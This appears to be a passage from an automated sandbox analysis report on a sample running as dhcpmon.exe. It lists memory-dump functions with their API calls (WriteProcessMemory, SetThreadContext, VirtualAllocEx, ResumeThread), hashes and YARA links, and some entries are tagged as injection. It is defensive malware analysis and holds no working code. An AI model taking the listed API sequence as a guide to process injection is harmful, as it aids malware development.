Opcode ID: df9ab955b2d065e37965ec3eab80ed781863b2bc8b1c166ecd4726a38fe84267
Instruction ID: 99d0377a5bab55f1f6e8f1dc8f351fda07e444a8b5b40541926213cffa71d622
Opcode Fuzzy Hash: df9ab955b2d065e37965ec3eab80ed781863b2bc8b1c166ecd4726a38fe84267
Instruction Fuzzy Hash: 7F212DB1D016199FCB10CFA9D5847EEFBF4AF48310F24856AE808A7241D7749944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 026ABA48, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 026ABAD8

Memory Dump Source

Source File: 00000015.00000002.387822308.00000000026A0000.00000040.00000001.sdmp, Offset: 026A0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5572fb138f4692a9637d0c46a4e6eb2389fc76081746234c907a9ea0d6a18ed6
Instruction ID: efa50029839082d9444bcb5fd754746c50af038c7c9ec361d77a22201064e7e9
Opcode Fuzzy Hash: 5572fb138f4692a9637d0c46a4e6eb2389fc76081746234c907a9ea0d6a18ed6
Instruction Fuzzy Hash: 502128719003599FCB00CFA9C984BEEBBF5FF48314F10842AE919A7240D7749944DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 026AC33C, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00000000,?), ref: 026AE1D8

Memory Dump Source

Source File: 00000015.00000002.387822308.00000000026A0000.00000040.00000001.sdmp, Offset: 026A0000, based on PE: false

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: dac9488ce5000d7c669fe4bf5fe09994c388a9412ad83155615e634d5c6e9427
Instruction ID: 3ad2830dc71ac207360838c288e7ed6119507d3fe83305bc0dc08c4d50877026
Opcode Fuzzy Hash: dac9488ce5000d7c669fe4bf5fe09994c388a9412ad83155615e634d5c6e9427
Instruction Fuzzy Hash: 88213871D002198FDB14CFAAD944BEEBBF5EB88314F14842AE415A3750D774A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 026AC030, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 026AC0B0

Memory Dump Source

Source File: 00000015.00000002.387822308.00000000026A0000.00000040.00000001.sdmp, Offset: 026A0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 38ffca4824bd994fdd93e13ba2acdb39b043bcaee05d1c51c929f8fcca605ac2
Instruction ID: 51780eb2b3c4d4fad3e6145a0dbc67a3799214ba2406a6bb54a9c5e13f6ddda8
Opcode Fuzzy Hash: 38ffca4824bd994fdd93e13ba2acdb39b043bcaee05d1c51c929f8fcca605ac2
Instruction Fuzzy Hash: D0212871D003599FCB10CFAAC884AEEBBF5FF48314F50882AE518A7240D7759944DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 026AB8B0, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

GetThreadContext.KERNELBASE(?,00000000), ref: 026AB92E

Memory Dump Source

Source File: 00000015.00000002.387822308.00000000026A0000.00000040.00000001.sdmp, Offset: 026A0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: d14cd2a490d3b420f8029199d277392fb6eb5ae680a93386676e4174309fe33c
Instruction ID: 544cbe74854cb12341ebaae0640671451755b2ebeb400911215d77fcf84e104f
Opcode Fuzzy Hash: d14cd2a490d3b420f8029199d277392fb6eb5ae680a93386676e4174309fe33c
Instruction Fuzzy Hash: 672139719003098FDB10CFAAC4847EEBBF4AF48218F54842AD559A7240DB789945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 026AD960, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(00000000,?,?), ref: 026AD9E3

Memory Dump Source

Source File: 00000015.00000002.387822308.00000000026A0000.00000040.00000001.sdmp, Offset: 026A0000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 2de8aee98015c06b975bf757401b2b4e1784607b855c4eda0fc6eae93b7b1c29
Instruction ID: 7712b801f9af52286a04d2981d0e5b613d270acdf2f8af810af1df7eb22a700a
Opcode Fuzzy Hash: 2de8aee98015c06b975bf757401b2b4e1784607b855c4eda0fc6eae93b7b1c29
Instruction Fuzzy Hash: D02104B1D016199FDB00CF9AC985BDEFBF4BB49314F14812AE908A7740D774A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 026ADCC8, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 026ADD3B

Memory Dump Source

Source File: 00000015.00000002.387822308.00000000026A0000.00000040.00000001.sdmp, Offset: 026A0000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 9712557aa4ec95d6c16e75e8540cf4051c17f1e76f818b114566824519a160dd
Instruction ID: afe42f0a82de3a1a656e9df036b25d22aabc74d819d16123d8ecdde0aabf8894
Opcode Fuzzy Hash: 9712557aa4ec95d6c16e75e8540cf4051c17f1e76f818b114566824519a160dd
Instruction Fuzzy Hash: BD2106B19002099FCB10DFAAC584BDEBBF4FF48324F14842AE558A7650D778A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 026A949B, Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 026A9513

Memory Dump Source

Source File: 00000015.00000002.387822308.00000000026A0000.00000040.00000001.sdmp, Offset: 026A0000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1a9beb559333a7dbf04aa36e6499370b4aaee19543ecaac89e16d48f57c4d11e
Instruction ID: adfad49efdc1cdc39d981e024e1e489c5b60e5d5f61f1433c03e219f7bd4ebd9
Opcode Fuzzy Hash: 1a9beb559333a7dbf04aa36e6499370b4aaee19543ecaac89e16d48f57c4d11e
Instruction Fuzzy Hash: D82127759002499FCB10CFAAC584BDEBFF4AF48320F14842AE458A3250D3749945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 026A94A0, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 026A9513

Memory Dump Source

Source File: 00000015.00000002.387822308.00000000026A0000.00000040.00000001.sdmp, Offset: 026A0000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ccbf42d4f990bb0a26680507a8181ddf12f2d8814e6d3bc8c1d3bd5b6cf6cd08
Instruction ID: cd3f4b694f522a424b828de7cc1b64325f487c9072b08aeeba109841588cc68b
Opcode Fuzzy Hash: ccbf42d4f990bb0a26680507a8181ddf12f2d8814e6d3bc8c1d3bd5b6cf6cd08
Instruction Fuzzy Hash: 6E21E7759002499FCB10DF9AC584BDEFBF4FB48324F14842AE558A7250D374AA45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 026AB988, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 026AB9F6

Memory Dump Source

Source File: 00000015.00000002.387822308.00000000026A0000.00000040.00000001.sdmp, Offset: 026A0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bf88ffacf9ec3bbb8b382ebf230d8c420f63289f1275f0212510cc4b039ca52c
Instruction ID: 8e186571c012358b05a54404b84b6c37d698184556a6183d01b78976c1855b25
Opcode Fuzzy Hash: bf88ffacf9ec3bbb8b382ebf230d8c420f63289f1275f0212510cc4b039ca52c
Instruction Fuzzy Hash: 97112671900249DBCB10DFAAC844BEFBFF9EF88324F14881AE515A7250C775A944DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 026AB800, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 026AB862

Memory Dump Source

Source File: 00000015.00000002.387822308.00000000026A0000.00000040.00000001.sdmp, Offset: 026A0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: dd92b0b6527b761718363ba6101353529af4824b0716fc7e56c39b32f2d88440
Instruction ID: b514d6e476d238693b9fe7794e20af21dbb8b61a425a857e98426bf2bd9e5704
Opcode Fuzzy Hash: dd92b0b6527b761718363ba6101353529af4824b0716fc7e56c39b32f2d88440
Instruction Fuzzy Hash: 7D112871D00349CBDB10DFAAC4447EFBBF9AB88628F24882AD515A7240D774A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 009FD3EC, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.386820992.00000000009FD000.00000040.00000001.sdmp, Offset: 009FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd7d950f33737e19b0de29dcca5528c745e8193bf927254012e2f26aae412134
Instruction ID: b2035b46575a8d6437db988922e450fd65e66a8d9005085c3bf72a8e23922c15
Opcode Fuzzy Hash: dd7d950f33737e19b0de29dcca5528c745e8193bf927254012e2f26aae412134
Instruction Fuzzy Hash: FA212871505208DFDB01DF50D8C0B76BB6AFB98324F24C969DA090B2A6C33AE846C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00C2D030, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.387481980.0000000000C2D000.00000040.00000001.sdmp, Offset: 00C2D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ce41369696e4044ddcce910fcd6c9c802a4521c9b5a9ae1db1a093b45ce843f
Instruction ID: ba074dc9ff64a6fb0ded370b254195ff46d4e2ce1b318c52882df381d83267d8
Opcode Fuzzy Hash: 2ce41369696e4044ddcce910fcd6c9c802a4521c9b5a9ae1db1a093b45ce843f
Instruction Fuzzy Hash: AB210871504340DFDB10DF14E5C0B6ABBA9FBA4314F34C56AD9064BA51C336DC47C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 00C2D005, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.387481980.0000000000C2D000.00000040.00000001.sdmp, Offset: 00C2D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c77a491c03e694ef3cc1503e51b1a8e27a8970549760d650341e6a6329632005
Instruction ID: 43216bb785b18e4a3ed7b805e2fc234a71ac5c3300a5b72c2422192c72519927
Opcode Fuzzy Hash: c77a491c03e694ef3cc1503e51b1a8e27a8970549760d650341e6a6329632005
Instruction Fuzzy Hash: AF216D7550D3C09FD7038B24E990715BF71AB97224F29C1EBC8858B6A7C33A9D0AC762

Uniqueness

Uniqueness Score: -1.00%

Function 009FD3E7, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.386820992.00000000009FD000.00000040.00000001.sdmp, Offset: 009FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4274775be6c99b4271e93a1e0e4a35333169c36f293b5df4524ad4ee5e930615
Instruction ID: 9a0fc30bb8135e2b15c69404d21f9d0f3b38e1483eb033f51b78747c94b48c5c
Opcode Fuzzy Hash: 4274775be6c99b4271e93a1e0e4a35333169c36f293b5df4524ad4ee5e930615
Instruction Fuzzy Hash: 2211E676505284DFDF01CF10D5C4B26BF72FB94320F24C6A9D9080B666C33AE85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: dhcpmon.exe PID: 6304 Parent PID: 3292 dhcpmon.exeCOMMON

Executed Functions

Function 0294BBEE, Relevance: 1.7, APIs: 1, Instructions: 244processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0294BE26

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3582793bdade75a50f730233fdf69750a4b9b6048a037a34d03fdf2f62ebe54e
Instruction ID: 30e83f572617959967505387c913689dd4562d3e6d4d9a7cbd7ac975584e10f3
Opcode Fuzzy Hash: 3582793bdade75a50f730233fdf69750a4b9b6048a037a34d03fdf2f62ebe54e
Instruction Fuzzy Hash: 6A916071D00619CFDF10CFA9C891BEEBBB6BF48318F1485AAD809A7250DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0294BBF0, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0294BE26

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5609195ff60ecce8a8c9e8597d3bdc36ad798de8de7a7c0903acde24a7c96ad2
Instruction ID: aed627de4d8a2043952eb3edc7614fb700c47de8d789a3e0a30d1de66ff66982
Opcode Fuzzy Hash: 5609195ff60ecce8a8c9e8597d3bdc36ad798de8de7a7c0903acde24a7c96ad2
Instruction Fuzzy Hash: 72917171D00619CFDF10CFA9C891BEEBBB6BF48318F1485AAD809A7250DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0294DD90, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 0294DE91

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: ec60f3b7fbb5bcfcabb4dd30057155bcfcc7068f8b656616a614dfbb3e32204e
Instruction ID: 13a9cd6707ed3341879f3526a0e75b38338fb5d319ec87b5bd717d88344bf58e
Opcode Fuzzy Hash: ec60f3b7fbb5bcfcabb4dd30057155bcfcc7068f8b656616a614dfbb3e32204e
Instruction Fuzzy Hash: B8413478D006588FDB14CFA9C894BDEBBF5BF48318F148569E819AB350CB74A845CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0294DD88, Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

APIs

K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 0294DE91

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: BaseModuleName
String ID:
API String ID: 595626670-0
Opcode ID: 276ea861d4624544cbf1f0b21e4294820823fdc3b6cd66627fccb36e131fe19a
Instruction ID: c30387ce92a1efbe272a0aa4b6cebded066c6150369a982eb0e0c529a763c726
Opcode Fuzzy Hash: 276ea861d4624544cbf1f0b21e4294820823fdc3b6cd66627fccb36e131fe19a
Instruction Fuzzy Hash: 51413778D006588FDB14CF99C494BDEBBF5BF48318F148569E819AB250CB749845CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02949CA1, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,00000000,?), ref: 02949D61

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 3afc329f7e85007f03cc37aac3e21520280a6aa5ed3ae3e183feb660dd93d3b2
Instruction ID: 707ae71e2c3868b42c3b2c524f4d816efb8bacf8f1d5feaea22b9fb477ec61dd
Opcode Fuzzy Hash: 3afc329f7e85007f03cc37aac3e21520280a6aa5ed3ae3e183feb660dd93d3b2
Instruction Fuzzy Hash: FD316BB1D053558FDB11CFA9D880AEEBFF5AF49310F1980AAE844EB252D7349905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02949215, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 029492B1

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ba1c56b069c4f791d86c4703f88a3bd3dd8f5f5144481bc79a897b4fb0d3275d
Instruction ID: eaef725ff02e7f547e9d85c1cbc0b997d62907dbbc77710a7eab43f7286d82d8
Opcode Fuzzy Hash: ba1c56b069c4f791d86c4703f88a3bd3dd8f5f5144481bc79a897b4fb0d3275d
Instruction Fuzzy Hash: 6431E4B0D01248DFDB10CFA9D584BDEBBF5AF89318F24842AE405AB260DB756946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02949469, Relevance: 1.6, APIs: 1, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02949513

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c5b4732d5dae4056f86aa42117d7d0693cfa5c132bd6119cc501ef53eccf4d18
Instruction ID: e22e8b4138f70eeaf0121c70ab884fc38f16d9d1e305c244fbe8151e9e4e0f70
Opcode Fuzzy Hash: c5b4732d5dae4056f86aa42117d7d0693cfa5c132bd6119cc501ef53eccf4d18
Instruction Fuzzy Hash: C62112759042499FDB10CFAAC884B9EBBF4BF49320F10846AE958A7251C774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0294BA40, Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0294BAD8

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 76a76a78c0d52216359ab56b0dbbefdb6e639168e2e296c1f4e8e62711795599
Instruction ID: a870766b4d76f928a49af73901a920b272408dd00576177deccc6116ae6882b1
Opcode Fuzzy Hash: 76a76a78c0d52216359ab56b0dbbefdb6e639168e2e296c1f4e8e62711795599
Instruction Fuzzy Hash: E2212871D003599FCB10CFA9C885BEEBBF5FF88314F14882AE915A7250CB749955DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02949220, Relevance: 1.6, APIs: 1, Instructions: 71libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 029492B1

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 49b98f4219a758af9a85637f07d2da34dd79c75c682840b20c8c62bfa13777ec
Instruction ID: 6330de95f1ab210b897b77df6e49a28b13f099bffc66c1955d00242aaa011625
Opcode Fuzzy Hash: 49b98f4219a758af9a85637f07d2da34dd79c75c682840b20c8c62bfa13777ec
Instruction Fuzzy Hash: 8031C1B0D05208DFDB14CFA9D584BCEBBF5AF48318F24842AE405BB260DB756945CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0294C32F, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00000000,?), ref: 0294E1D8

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: d19a12b0d4a6a4eb6ae79b7e978e15a843b27b226b547fa8760a64e8685287e4
Instruction ID: 2c83a14ad4e033efa94b4516a161f0660a4b763c2663fc63015f209690f1fd17
Opcode Fuzzy Hash: d19a12b0d4a6a4eb6ae79b7e978e15a843b27b226b547fa8760a64e8685287e4
Instruction Fuzzy Hash: E7216971A002098FDB14CFA9C844BEEBBF5FF88324F14846AE454A7290DB34A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02949CC8, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,00000000,?), ref: 02949D61

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 68ae048939fcb1fbf8631ef1b448e0813abd1a3939ad892733bbc8b2ef9d6cd1
Instruction ID: 61bdb957204d890b8f346dc9311ba57276d06020bc3530b4f60d3848882ca376
Opcode Fuzzy Hash: 68ae048939fcb1fbf8631ef1b448e0813abd1a3939ad892733bbc8b2ef9d6cd1
Instruction Fuzzy Hash: 06213DB1D016199FDB10CFA9D484BEEFBF5EF88320F14856AE808A7241D734A945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0294BA48, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0294BAD8

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 807e3fa23208ebdb87185a86508749d35f62ad22fa20ab28b15fb1ccd93d3b39
Instruction ID: a341dad89b2c6a1312a3f53686480fcfce1f7f5830c14bfdc98b39c0f9d547e6
Opcode Fuzzy Hash: 807e3fa23208ebdb87185a86508749d35f62ad22fa20ab28b15fb1ccd93d3b39
Instruction Fuzzy Hash: DD2128719003599FCB10CFA9C884BEEBBF5FF88314F54882AE918A7250D7749945DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0294B8A9, Relevance: 1.6, APIs: 1, Instructions: 67threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 0294B92E

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 926ab2f9f489879ccb7537f4e90e2c040d9f57092368a5c3c49b8c29a64a302d
Instruction ID: a551841c527fc6817c20daed213efe1545f5af03b31a86528a567c07573e6895
Opcode Fuzzy Hash: 926ab2f9f489879ccb7537f4e90e2c040d9f57092368a5c3c49b8c29a64a302d
Instruction Fuzzy Hash: 37213C71D003099FDB10DFA9C484BEEBBF5EF88328F54842AD555A7240DB789945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0294C028, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0294C0B0

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: eab8efdce61a51fe9c1ce623bbf678861d12083aabe55ffae857f8b316ea0393
Instruction ID: 5262cdf42c32899f32484e9d4c116ffbeea8d13b0fbd21175a4adb28017fc7d6
Opcode Fuzzy Hash: eab8efdce61a51fe9c1ce623bbf678861d12083aabe55ffae857f8b316ea0393
Instruction Fuzzy Hash: E92125B1D013098FCB10CFA9C984AEEBBF5FF48314F50882AE519A7250D7389945DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0294C33C, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00000000,?), ref: 0294E1D8

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: 43a618856dc677810894a3e9663a2743a5ddc7367195f512ee5d08d928dad239
Instruction ID: 12eddbb181117520f36dcb6105810960d10ca49533b91e84f833a26f110bfb91
Opcode Fuzzy Hash: 43a618856dc677810894a3e9663a2743a5ddc7367195f512ee5d08d928dad239
Instruction Fuzzy Hash: 97213575D002098FDB14CFAAD844BEEBBF9FF88324F14842AE455A7250DB74A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0294B8B0, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 0294B92E

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: fcf1b0aa2d03be477d9a684bbcd37ed92b2554745e3d5c39c157934354773498
Instruction ID: 7527b7b75c493c4f9af3d989c02fb4049690a55a1f232812deea5c91698f4544
Opcode Fuzzy Hash: fcf1b0aa2d03be477d9a684bbcd37ed92b2554745e3d5c39c157934354773498
Instruction Fuzzy Hash: AF211A71D003098FDB10DFAAC484BEEBBF5EF88328F54842AD559A7240DB789945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0294C030, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0294C0B0

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9d7a6ee51e3c2d14163c09081cc084bf0ac04f09a97e382d7a49e5139c3e692c
Instruction ID: 320027088739366775aa38899d7291146309eca7d465f6e4335e9eb843f97fa8
Opcode Fuzzy Hash: 9d7a6ee51e3c2d14163c09081cc084bf0ac04f09a97e382d7a49e5139c3e692c
Instruction Fuzzy Hash: 82212871D013599FCF10CFA9C884AEEBBF5FF48314F50882AE518A7250D774A945DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0294D95B, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(00000000,?,?), ref: 0294D9E3

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: a84a14f00c362f64b2b93d9fa5c1c7b26547ceb835e6afb2402c9ac299d0d7bb
Instruction ID: 1b4d274027248a8010471a9074d07ddc8c6562cf1ff6fa2ceb60f1066abe7b2a
Opcode Fuzzy Hash: a84a14f00c362f64b2b93d9fa5c1c7b26547ceb835e6afb2402c9ac299d0d7bb
Instruction Fuzzy Hash: 9B2134B5D016199FDB00CFA9C985BEEFBB8BB48314F14812AE508F7340D738A944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0294D960, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(00000000,?,?), ref: 0294D9E3

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 7869df4e447d14ecfed98339ae1daeb395453d0f07b4c5ee466f0c90b0ea8ae1
Instruction ID: 163bea18411c650a76ce9dfc0556574aa076d1b5e768637f17753a242a8349bc
Opcode Fuzzy Hash: 7869df4e447d14ecfed98339ae1daeb395453d0f07b4c5ee466f0c90b0ea8ae1
Instruction Fuzzy Hash: 532104B5D016199FCB00CF9AC885BDEFBF8BB49324F54812AE508B7340D774A944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0294E158, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00000000,?), ref: 0294E1D8

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: ChildEnumWindows
String ID:
API String ID: 3555792229-0
Opcode ID: b334091c2a2a2f4326727cc666cc0ecd424277da19eea8a276ae73f5f632c40d
Instruction ID: b4bb513f32301856348d16ca008c49e11fe6a7b4a76aae7866ec2571cd6ba2e7
Opcode Fuzzy Hash: b334091c2a2a2f4326727cc666cc0ecd424277da19eea8a276ae73f5f632c40d
Instruction Fuzzy Hash: E3213871D002098FDB14CFA9C844BEEBBF5AF88324F14842AE455A7290CB74A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0294DCC3, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 0294DD3B

Memory Dump Source

Source File: 00000016.00000002.397208559.0000000002940000.00000040.00000001.sdmp, Offset: 02940000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: a6a2d6c23a1485b5fb75bdf09ec5cb1631aeb224b89c4aef3eb60d776e537920
Instruction ID: daa9868bbcd8c3d2468f36378194401a7cc56a348ff197d31d10289b5191f19b
Opcode Fuzzy Hash: a6a2d6c23a1485b5fb75bdf09ec5cb1631aeb224b89c4aef3eb60d776e537920
